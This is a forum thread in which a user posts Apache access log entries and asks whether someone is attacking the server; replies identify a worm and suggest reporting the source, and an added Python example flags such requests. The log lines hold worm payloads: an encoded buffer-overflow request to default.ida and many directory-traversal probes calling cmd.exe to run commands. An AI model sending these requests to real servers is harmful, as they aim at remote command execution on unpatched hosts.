
apache access log


Guest quakey

Hi,

 

Frequently I got the following lines in the access log:

 

68.165.217.90 - - [29/Jul/2003:20:43:09 -0700] "GET /default.ida?XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

127.0.0.1 - - [29/Jul/2003:20:44:32 -0700] "GET / HTTP/1.0" 200 4944 "-" "mon.d/http.monitor"

68.165.90.188 - - [29/Jul/2003:20:44:57 -0700] "GET /default.ida?XXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:02 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:03 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:05 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:07 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:08 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:10 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:12 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:13 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:15 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:17 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:18 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:20 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:21 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

 

 

What are those? ppl trying to hack my server? Thank you.


thankfully you have nothing to worry about! so just ignore it ;-) if the IP it's coming from is frequently the same, i would jump over to arin.net, do a whois on it,

and send an email off to whomever the address block it's in belongs to (i would look for an abuse email address or possibly the tech email address). help stop the spread of the worm! :)

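The log in the question shows two request shapes: a `default.ida` request with a long `%u`-encoded query string, and `root.exe` / `cmd.exe` requests ending in `?/c+dir`, all answered by Apache with 404 or 400. As an added example (not part of the thread), the Python below groups such requests by source IP and reports whether any of them was actually served with a status below 400; the signature labels, function names and regular expressions are this example's own assumptions.

```python
import re
from collections import defaultdict

# Apache common/combined format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# Request shapes seen in the posted log; the labels are this example's own.
SIGNATURES = [
    ("ida-overflow", re.compile(r'\.ida\?.*(?:%u[0-9a-f]{4}){4,}', re.I)),
    ("cmd-probe", re.compile(r'/(?:root|cmd)\.exe\?/c\+', re.I)),
]

def classify(request):
    """Return the signature label for a request line, or None for ordinary traffic."""
    for label, pattern in SIGNATURES:
        if pattern.search(request):
            return label
    return None

def summarize(lines):
    """Count probe hits per source IP and list any probe served with status < 400."""
    report = defaultdict(lambda: {"hits": defaultdict(int), "served": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in common/combined format, skip
        host, _when, request, status, _size = m.groups()
        label = classify(request)
        if label is None:
            continue
        report[host]["hits"][label] += 1
        if int(status) < 400:
            report[host]["served"].append(request)
    return {h: {"hits": dict(e["hits"]), "served": e["served"]}
            for h, e in report.items()}

# Sample input: five lines copied from the log in the question above.
SAMPLE = [
    r'68.165.217.90 - - [29/Jul/2003:20:43:09 -0700] "GET /default.ida?XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"',
    r'127.0.0.1 - - [29/Jul/2003:20:44:32 -0700] "GET / HTTP/1.0" 200 4944 "-" "mon.d/http.monitor"',
    r'68.83.63.234 - - [29/Jul/2003:20:45:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"',
    r'68.83.63.234 - - [29/Jul/2003:20:45:15 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"',
    r'68.83.63.234 - - [29/Jul/2003:20:45:18 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"',
]

if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        print(host, info["hits"], "SERVED" if info["served"] else "all rejected")
```

An empty `served` list for every source means each probe was rejected, which is the case for all lines in the posted log.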

Hey tyme, just had to scroll three miles to the right to read your post :evil:
not my fault! it was the length of the original post which caused the stretched box.

but i dropped a return into my post so that people wouldn't have to scroll :) (or at least not much...not sure if it renders much differently on my 1600x1200 screen as it would on smaller resolutions)
